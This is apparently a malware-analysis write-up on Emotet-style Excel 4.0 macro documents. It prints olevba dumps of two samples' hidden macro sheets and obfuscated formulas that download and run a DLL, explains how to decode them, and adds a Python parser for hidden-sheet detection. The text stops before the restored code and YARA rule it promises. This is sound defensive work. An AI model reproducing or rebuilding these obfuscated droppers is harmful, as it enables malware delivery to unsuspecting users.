# Background
At work I kept running into macro documents obfuscated and hidden the same way: they use the structure of an Excel workbook to scatter the data across many cells, then use Excel's own functions to pull the cell values back out and join them into a code string that is executed. The malicious behaviour is to download a DLL to the local machine and run it through regsvr32.exe.
# Macro code
Below, the execution flow of the malicious documents is described briefly using the macro code of two samples, extracted with `olevba` from `oletools`:
## 6EE99C20494D3876BEF6F882CA25DEE2
olevba 0.60 on Python 3.10.1 - http://decalage.info/python/oletools
===============================================================================
FILE: Payment Status, United Kingdom.xls.6EE99C20494D3876BEF6F882CA25DEE2
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Shee
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Rvfs
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Rvfs
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Rvfs
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - PFE
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - !
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - !
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 27 LABEL : Cell Value, String Constant - UDYQ1 len=7 ptgRef3d Shee!B7
' 0018 27 LABEL : Cell Value, String Constant - UDYQ2 len=7 ptgRef3d Shee!B9
' 0018 27 LABEL : Cell Value, String Constant - UDYQ3 len=7 ptgRef3d Shee!B11
' 0018 27 LABEL : Cell Value, String Constant - UDYQ4 len=7 ptgRef3d Shee!B13
' 0018 27 LABEL : Cell Value, String Constant - UDYQ5 len=7 ptgRef3d Shee!B15
' 0018 27 LABEL : Cell Value, String Constant - UDYQ6 len=7 ptgRef3d Shee!B17
' 0018 27 LABEL : Cell Value, String Constant - UDYQ7 len=7 ptgRef3d Shee!B19
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Shee!B1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Rvfs,E2,CHAR(113-2),""
' Rvfs,G2,CHAR(111-6),""
' Rvfs,L2,CHAR(71-6),""
' Rvfs,C3,CHAR(111+3),""
' Rvfs,I3,CHAR(87-4),""
' Rvfs,P3,CHAR(90+2),""
' Rvfs,F4,CHAR(100-18),""
' Rvfs,H4,CHAR(110-9),""
' Rvfs,K4,"",1.00000000000000000000
' Rvfs,N4,CHAR(89-1),""
' Rvfs,B5,CHAR(115+2),""
' Rvfs,P5,CHAR(44+2),""
' Rvfs,E6,CHAR(90-6),""
' Rvfs,J6,CHAR(77-3),""
' Rvfs,D7,CHAR(107+3),""
' Rvfs,F7,"",3.00000000000000000000
' Rvfs,M7,CHAR(117-2),""
' Rvfs,P7,CHAR(41+3),""
' Rvfs,C9,CHAR(110-2),""
' Rvfs,H9,CHAR(70-3),""
' Rvfs,K9,CHAR(55-7),""
' Rvfs,P9,CHAR(55+5),""
' Rvfs,F10,CHAR(123-4),""
' Rvfs,E11,CHAR(80+5),""
' Rvfs,J11,CHAR(80-7),""
' Rvfs,L11,CHAR(100-1),""
' Rvfs,P11,CHAR(35+5),""
' Rvfs,A12,CHAR(107+2),""
' Rvfs,D13,CHAR(72-4),""
' Rvfs,H13,CHAR(68+1),""
' Rvfs,N13,"",2.00000000000000000000
' Rvfs,P13,CHAR(36+5),""
' Rvfs,G14,CHAR(124-4),""
' Rvfs,K14,CHAR(70-4),""
' Rvfs,B15,CHAR(80-4),""
' Rvfs,F15,CHAR(105-5),""
' Rvfs,P15,CHAR(31+3),""
' Rvfs,D17,CHAR(102-5),""
' Rvfs,I17,CHAR(78+1),""
' Rvfs,P17,CHAR(40-2),""
' Rvfs,B18,CHAR(65+5),""
' Rvfs,P19,CHAR(32),""
' Rvfs,H20,"",8.00000000000000000000
' Rvfs,P20,CHAR(52+6),""
' Rvfs,P22,CHAR(66-5),""
' Rvfs,K23,CHAR(80-2),""
' Rvfs,G24,CHAR(84-2),""
' Rvfs,I26,CHAR(84),""
' Rvfs,I32,_xlfn.ARABIC("CXI"),""
' Rvfs,O33,_xlfn.ARABIC("LXVII"),""
' Rvfs,E35,_xlfn.ARABIC("LXI"),""
' Rvfs,Q36,_xlfn.ARABIC("CXIV"),""
' Rvfs,K37,_xlfn.ARABIC("CI"),""
' Rvfs,E3,T( Rvfs!D13& Rvfs!E2& Rvfs!F10& Rvfs!D7& Rvfs!C9& Rvfs!E2& Rvfs!D17& Rvfs!F15& Rvfs!E6& Rvfs!E2& Rvfs!B18& Rvfs!G2& Rvfs!C9),""
' Rvfs,G5,T( Rvfs!P15& Rvfs!P7& Rvfs!P15& Rvfs!J6& Rvfs!J6& Rvfs!H9& Rvfs!H9& Rvfs!K14& Rvfs!K14& Rvfs!P15),""
' Rvfs,C7,T( Rvfs!P11& Rvfs!P15& Rvfs!B5& Rvfs!C3& Rvfs!C9),""
' Rvfs,I9,T( Rvfs!P7& Rvfs!K9& Rvfs!P7),""
' Rvfs,D11,T( Rvfs!A12& Rvfs!E2& Rvfs!D7& Rvfs!P15& Rvfs!P7& Rvfs!P15& Rvfs!E11& Rvfs!F4& Rvfs!B15),""
' Rvfs,N4,T( Rvfs!P9& Rvfs!K9& Rvfs!P7& Rvfs!P19),""
' Rvfs,B5,T( Rvfs!P19& Rvfs!P5& Rvfs!P5& Rvfs!P3& Rvfs!D17& Rvfs!F15& Rvfs!F10& Rvfs!P5& Rvfs!F15& Rvfs!C9& Rvfs!C9),""
' Rvfs,P8,T( Rvfs!P19& Rvfs!P2& Rvfs!M7),""
' Rvfs,N14,T( Rvfs!P5& Rvfs!P5& Rvfs!P3& Rvfs!D17& Rvfs!F15& Rvfs!F10& Rvfs!P5& Rvfs!F15& Rvfs!C9& Rvfs!C9),""
' Rvfs,E16,T( Rvfs!P15& Rvfs!P7& Rvfs!K9& Rvfs!P7& Rvfs!K9& Rvfs!P13),""
' PFE,B5,"FORMULA( Rvfs!C15, Rvfs!F3)=FORMULA( Rvfs!P22& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!F19&!!N14&!!E16,B7)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ1"&!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!G21&!!N14&!!E16& Rvfs!P13,B9)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ2"&!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!H19&!!N14&!!E16& Rvfs!P13,B11)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ3"&!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!I21&!!N14&!!E16& Rvfs!P13,B13)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ4"&!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!J19&!!N14&!!E16& Rvfs!P13,B15)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ5"&!!N4& Rvfs!H9& Rvfs!L2& Rvfs!B15& Rvfs!B15& PFE!C7& PFE!D11& PFE!E3& Rvfs!F3& Rvfs!L2& PFE!G5& PFE!I9& PFE!K21&!!N14&!!E16& Rvfs!P13,B17)=FORMULA( Rvfs!P22& Rvfs!J11& Rvfs!B18& Rvfs!P11&"UDYQ6"&!!N4& Rvfs!H9& Rvfs!B15& Rvfs!I17& Rvfs!I3& Rvfs!H13& Rvfs!P11& Rvfs!K9& Rvfs!P13& Rvfs!P7& Rvfs!P13,B21)=FORMULA( Rvfs!P22& Rvfs!H13& Rvfs!N4& Rvfs!H13& Rvfs!H9& Rvfs!P11& Rvfs!P15& Rvfs!H9& Rvfs!P20&!!D3&!!J6&!!F11&!!P8&!!B5& Rvfs!P15& Rvfs!P13,B23)=FORMULA( Rvfs!P22&!!R6& Rvfs!P11& Rvfs!P13,B28)",""
' !,C15,CHAR( Rvfs!K37),""
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |Auto_Open |Runs when the Excel Workbook is opened |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|XLM macro |XLM macro found. It may contain malicious |
| | |code |
+----------+--------------------+---------------------------------------------+
## FBE4106C4303401DF89F6CFF0B1DBABC
olevba 0.60 on Python 3.10.1 - http://decalage.info/python/oletools
===============================================================================
FILE: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC
Type: OLE
WARNING invalid value for PROJECTLCID_Id expected 0002 got 004A
WARNING invalid value for PROJECTLCID_Lcid expected 0409 got 0002
WARNING invalid value for PROJECTLCIDINVOKE_Id expected 0014 got 0002
WARNING invalid value for PROJECTCODEPAGE_Id expected 0003 got 0014
WARNING invalid value for PROJECTCODEPAGE_Size expected 0002 got 0004
WARNING invalid value for PROJECTNAME_Id expected 0004 got 0000
ERROR PROJECTNAME_SizeOfProjectName value not in range [1-128]: 131075
ERROR Error in _extract_vba
Traceback (most recent call last):
File "D:\DEV\Python\Python310\lib\site-packages\oletools\olevba.py", line 3544, in extract_macros
for stream_path, vba_filename, vba_code in \
File "D:\DEV\Python\Python310\lib\site-packages\oletools\olevba.py", line 2112, in _extract_vba
project = VBA_Project(ole, vba_root, project_path, dir_path, relaxed)
File "D:\DEV\Python\Python310\lib\site-packages\oletools\olevba.py", line 1770, in __init__
projectdocstring_id = struct.unpack("<H", dir_stream.read(2))[0]
struct.error: unpack requires a buffer of 2 bytes
-------------------------------------------------------------------------------
VBA MACRO Лист1
in file: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC - OLE stream: 'Лист1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub Image1_BeforeDragOver(ByVal Cancel As MSForms.ReturnBoolean, ByVal Data As MSForms.DataObject, ByVal X As Single, ByVal Y As Single, ByVal DragState As MSForms.fmDragState, ByVal Effect As MSForms.ReturnEffect, ByVal Shift As Integer)
End Sub
-------------------------------------------------------------------------------
VBA MACRO Лист2
in file: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC - OLE stream: 'Лист2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Лист3
in file: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC - OLE stream: 'Лист3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Лист4
in file: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC - OLE stream: 'Лист4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO ЭтаКнига
in file: 20220325_006099_005.xls.FBE4106C4303401DF89F6CFF0B1DBABC - OLE stream: 'ЭтаКнига'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Shee
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Vesfv
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Ufbd
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Pdvse
' 0085 11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - DD
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - PKEBEB
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 25 LABEL : Cell Value, String Constant - DFD len=7 ptgRef3d Ufbd!C7
' 0018 27 LABEL : Cell Value, String Constant - GRDS1 len=7 ptgRef3d Vesfv!E11
' 0018 27 LABEL : Cell Value, String Constant - GRDS2 len=7 ptgRef3d Vesfv!E13
' 0018 27 LABEL : Cell Value, String Constant - GRDS3 len=7 ptgRef3d Vesfv!E15
' 0018 27 LABEL : Cell Value, String Constant - GRDS4 len=7 ptgRef3d Vesfv!E17
' 0018 27 LABEL : Cell Value, String Constant - GRDS5 len=7 ptgRef3d Vesfv!E19
' 0018 27 LABEL : Cell Value, String Constant - GRDS6 len=7 ptgRef3d Vesfv!E21
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Vesfv!E1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Vesfv,E2,CHAR(113-2),""
' Vesfv,G2,CHAR(111-6),""
' Vesfv,L2,CHAR(71-6),""
' Vesfv,C3,CHAR(111+3),""
' Vesfv,I3,CHAR(87-4),""
' Vesfv,P3,CHAR(90+2),""
' Vesfv,F4,CHAR(100-18),""
' Vesfv,H4,CHAR(110-9),""
' Vesfv,K4,"",1.00000000000000000000
' Vesfv,N4,CHAR(89-1),""
' Vesfv,B5,CHAR(115+2),""
' Vesfv,P5,CHAR(44+2),""
' Vesfv,E6,CHAR(90-6),""
' Vesfv,J6,CHAR(77-3),""
' Vesfv,D7,CHAR(107+3),""
' Vesfv,F7,"",3.00000000000000000000
' Vesfv,M7,CHAR(117-2),""
' Vesfv,P7,CHAR(41+3),""
' Vesfv,C9,CHAR(110-2),""
' Vesfv,H9,CHAR(70-3),""
' Vesfv,K9,CHAR(55-7),""
' Vesfv,P9,CHAR(55+5),""
' Vesfv,F10,CHAR(123-4),""
' Vesfv,E11,CHAR(80+5),""
' Vesfv,J11,CHAR(80-7),""
' Vesfv,L11,CHAR(100-1),""
' Vesfv,P11,CHAR(35+5),""
' Vesfv,A12,CHAR(107+2),""
' Vesfv,D13,CHAR(72-4),""
' Vesfv,H13,CHAR(68+1),""
' Vesfv,N13,"",2.00000000000000000000
' Vesfv,P13,CHAR(36+5),""
' Vesfv,G14,CHAR(124-4),""
' Vesfv,K14,CHAR(70-4),""
' Vesfv,B15,CHAR(80-4),""
' Vesfv,F15,CHAR(105-5),""
' Vesfv,P15,CHAR(31+3),""
' Vesfv,D17,CHAR(102-5),""
' Vesfv,I17,CHAR(78+1),""
' Vesfv,P17,CHAR(40-2),""
' Vesfv,B18,CHAR(65+5),""
' Vesfv,P19,CHAR(32),""
' Vesfv,H20,"",8.00000000000000000000
' Vesfv,P20,CHAR(52+6),""
' Vesfv,P22,CHAR(66-5),""
' Vesfv,K23,CHAR(80-2),""
' Vesfv,G24,CHAR(84-2),""
' Vesfv,I26,CHAR(84),""
' Vesfv,I32,_xlfn.ARABIC("CXI"),""
' Vesfv,O33,_xlfn.ARABIC("LXVII"),""
' Vesfv,E35,_xlfn.ARABIC("LXI"),""
' Vesfv,Q36,_xlfn.ARABIC("CXIV"),""
' Vesfv,K37,_xlfn.ARABIC("CI"),""
' Ufbd,D5,T( Shee!P11& Shee!P15& Shee!B5& Shee!C3& Shee!C9& Shee!A12),""
' Ufbd,N6,T( Shee!E2& Shee!D17& Shee!F15& Shee!E6& Shee!E2& Shee!B18& Shee!G2& Shee!C9),""
' Ufbd,F11,T( Shee!E2& Shee!D7& Shee!P15& Shee!P7& Shee!P15& Shee!E11& Shee!F4& Shee!B15& Shee!D13),""
' Ufbd,P14,T( Shee!L2& Shee!P15& Shee!P7& Shee!P15& Shee!J6& Shee!J6& Shee!H9& Shee!H9& Shee!K14& Shee!K14& Shee!P15),""
' Ufbd,Q23,T( Shee!P2& Shee!M7),""
' Pdvse,E15,T( Shee!P19& Shee!P5& Shee!P5& Shee!P3& Shee!L11& Shee!M7& Shee!H4& Shee!G2& Shee!P5),""
' Pdvse,E23,T( Shee!E2& Shee!F10& Shee!D7& Shee!C9),""
' Pdvse,R24,T( Shee!P5& Shee!P5& Shee!P3& Shee!L11& Shee!M7& Shee!H4& Shee!G2& Shee!P5),""
' DD,D10,"CONCATENATE( Shee!F15, Shee!C9, Shee!C9, Shee!P15)",""
' PKEBEB,E9,"FORMULA( Shee!P22& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!E17& DD!R24& PKEBEB!D10& DD!H18,E11)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS1"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!E19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E13)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS2"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!G17& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E15)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS3"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!G19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E17)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS4"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!I17& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E19)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS5"& DD!S7& Shee!H9& Shee!L2& Shee!B15& Shee!B15& Pdvse!D5& Pdvse!F11& DD!E23& Pdvse!N6& Shee!H4& Pdvse!P14& DD!L19& Pdvse!I19& DD!R24& PKEBEB!D10& DD!H18& Shee!P13,E21)=FORMULA( Shee!P22& Shee!J11& Shee!B18& Shee!P11&"GRDS6"& DD!S7& Shee!H9& Shee!B15& Shee!I17& Shee!I3& Shee!H13& Shee!P11& Shee!K9& Shee!P13& Shee!P7& Shee!P13,E23)=FORMULA( Shee!P22& Shee!H13& Shee!N4& Shee!H13& Shee!H9& Shee!P11& Shee!P15& Shee!H9& Shee!P20& DD!O14& DD!P10& DD!K6& Shee!P19& Pdvse!Q23& DD!E15& PKEBEB!D10& Shee!P13,E25)=FORMULA( Shee!P22& Shee!G41& Shee!P11& Shee!P13,E27)",""
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |Auto_Open |Runs when the Excel Workbook is opened |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|XLM macro |XLM macro found. It may contain malicious |
| | |code |
+----------+--------------------+---------------------------------------------+
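The BOUNDSHEET lines at the top of both dumps are where the hiding is recorded: every record carries a visibility state and a sheet type, and olevba prints both ("Excel 4.0 macro sheet, hidden"). The `Microsoft_Excel_Hidden_Macrosheet` YARA rule quoted at the end of this article matches exactly those two bytes in the raw BIFF record. The following is an added example written for this article (not the page author's code and not part of oletools): it builds a constructed Workbook stream with three BoundSheet8 records and walks it the way olevba does, so that the parsed fields can be compared with the rule's byte pattern. The layout follows [MS-XLS] BoundSheet8 (lbPlyPos, hsState, dt, then the sheet name); the sample bytes are constructed, not taken from the two samples above. As a side note, with that layout a 13-byte BOUNDSHEET record (the length olevba prints next to "Shee" and "Rvfs") leaves 5 bytes for the name, which suggests the names olevba prints for these samples are truncated.

```python
import re
import struct

# Record ids from [MS-XLS]: BOF, BOUNDSHEET (BoundSheet8) and EOF.
BOF, BOUNDSHEET, EOF = 0x0809, 0x0085, 0x000A
HS_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0x00: "worksheet or dialog sheet", 0x01: "Excel 4.0 macro sheet",
              0x02: "chart", 0x06: "VBA module"}
# The two hex strings of Microsoft_Excel_Hidden_Macrosheet as one regex:
# record id 85 00, 2-byte length, 4-byte lbPlyPos, hsState 01|02, dt 01.
YARA_HIDDEN_MACRO = re.compile(rb"\x85\x00.{6}[\x01\x02]\x01", re.S)


def boundsheet(name, hs_state, dt, ply_pos=0):
    """Build one BoundSheet8 record: lbPlyPos(4) hsState(1) dt(1) cch(1) fHighByte(1) name."""
    body = struct.pack("<IBBBB", ply_pos, hs_state, dt, len(name), 0) + name.encode("latin-1")
    return struct.pack("<HH", BOUNDSHEET, len(body)) + body


def iter_records(stream):
    """Walk BIFF records: 2-byte id, 2-byte payload length, payload."""
    pos = 0
    while pos + 4 <= len(stream):
        rid, length = struct.unpack_from("<HH", stream, pos)
        yield rid, stream[pos + 4:pos + 4 + length]
        pos += 4 + length


def list_sheets(stream):
    """(name, state, type) for every BOUNDSHEET record, i.e. what olevba prints."""
    sheets = []
    for rid, data in iter_records(stream):
        if rid != BOUNDSHEET or len(data) < 8:
            continue
        hs_state, dt, cch, flags = struct.unpack_from("<4xBBBB", data)
        raw = data[8:]
        # fHighByte set -> UTF-16LE name, otherwise one byte per character
        name = raw[:2 * cch].decode("utf-16-le") if flags & 1 else raw[:cch].decode("latin-1")
        sheets.append((name, HS_STATE.get(hs_state & 3, "?"), SHEET_TYPE.get(dt, "?")))
    return sheets


def hidden_macro_sheets(stream):
    """Parsed form of the YARA condition: hsState hidden or very hidden, dt == macro sheet."""
    return [s for s in list_sheets(stream)
            if s[2] == "Excel 4.0 macro sheet" and s[1] != "visible"]


def yara_would_match(stream):
    """Byte-level form of the same condition, as the rule's hex strings see it."""
    return YARA_HIDDEN_MACRO.search(stream) is not None


def workbook(*sheets):
    """Constructed Workbook stream (not a real sample): BOF, BOUNDSHEET records, EOF."""
    return (struct.pack("<HH", BOF, 16) + bytes(16)
            + b"".join(sheets) + struct.pack("<HH", EOF, 0))


# Constructed streams: one with a very-hidden macro sheet (the Emotet layout), one clean.
MALICIOUS = workbook(boundsheet("Sheet1", 0, 0x00),
                     boundsheet("Rvfs", 1, 0x00),
                     boundsheet("PFE", 2, 0x01))
CLEAN = workbook(boundsheet("Sheet1", 0, 0x00), boundsheet("Macro1", 0, 0x01))

if __name__ == "__main__":
    # For a real .xls the stream comes from olefile.OleFileIO(path).openstream("Workbook").read()
    for name, state, kind in list_sheets(MALICIOUS):
        print(f"BOUNDSHEET : {kind}, {state} - {name}")
    print("hidden macro sheets:", hidden_macro_sheets(MALICIOUS),
          "yara:", yara_would_match(MALICIOUS))
```

The hidden worksheets (hsState 1, dt 0) do not trigger the rule, only the hidden or very hidden macro sheet does; a visible macro sheet, as in the CLEAN stream, is not matched either, which is the gap the `SUSP_Excel4Macro_AutoOpen` rule below covers from the other side by looking for the Auto_Open name record instead.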
# Note
This article only looks at batch processing with Python, detection evasion and counter-evasion, and C2 extraction; it does not cover debugging and is not a guide to analysing the samples. For that, see 《Emotet - 基于Excel4.0隐藏表格和宏代码》 (Emotet: hiding sheets and macro code with Excel 4.0).
# Restoring the strings

## Common: CHAR() with simple addition or subtraction
Handling:
- Python: regex-extract `CHAR\((\d+)([+-])(\d+)\)`, evaluate the arithmetic and convert the result with chr().
- Excel (recommended): paste the formulas into a sheet and let Excel evaluate them.

## Common: T() returning text
T() returns its argument unchanged when it is text, so these cells are just concatenations of the single-character cells.

## Uncommon: ARABIC() over Roman numerals stored as strings
Handling:
- Python: regex-extract `ARABIC\("([IVXLCDM]+)"\)`, convert the Roman numeral to an integer (see: converting between integers and Roman numerals; convert to a decimal integer first, then to ASCII) and apply chr().
- Excel (needs native Office): extract `ARABIC("...")` and prefix it with `=` to get `=ARABIC(original data)`.
  Note: WPS has no ARABIC function.
  In the end there were only a few of them, so I worked them out by hand 🧮😅

## Uncommon: FORMULA()
Writes the concatenated string into a target cell as a formula. The restored result is shown in the Code section below.
# Single characters
The single-character cells of 6EE99C20494D3876BEF6F882CA25DEE2 and FBE4106C4303401DF89F6CFF0B1DBABC are identical, presumably because the generator did not refresh them for each build.
It works like movable type: every cell holds one (identical) value, and only the formulas that combine those cells differ.
E2 =CHAR(113-2)
G2 =CHAR(111-6)
L2 =CHAR(71-6)
C3 =CHAR(111+3)
I3 =CHAR(87-4)
P3 =CHAR(90+2)
F4 =CHAR(100-18)
H4 =CHAR(110-9)
K4 =1
N4 =CHAR(89-1)
B5 =CHAR(115+2)
P5 =CHAR(44+2)
E6 =CHAR(90-6)
J6 =CHAR(77-3)
D7 =CHAR(107+3)
F7 =3
M7 =CHAR(117-2)
P7 =CHAR(41+3)
C9 =CHAR(110-2)
H9 =CHAR(70-3)
K9 =CHAR(55-7)
P9 =CHAR(55+5)
F10 =CHAR(123-4)
E11 =CHAR(80+5)
J11 =CHAR(80-7)
L11 =CHAR(100-1)
P11 =CHAR(35+5)
A12 =CHAR(107+2)
D13 =CHAR(72-4)
H13 =CHAR(68+1)
N13 =2
P13 =CHAR(36+5)
G14 =CHAR(124-4)
K14 =CHAR(70-4)
B15 =CHAR(80-4)
F15 =CHAR(105-5)
P15 =CHAR(31+3)
D17 =CHAR(102-5)
I17 =CHAR(78+1)
P17 =CHAR(40-2)
B18 =CHAR(65+5)
P19 =CHAR(32)
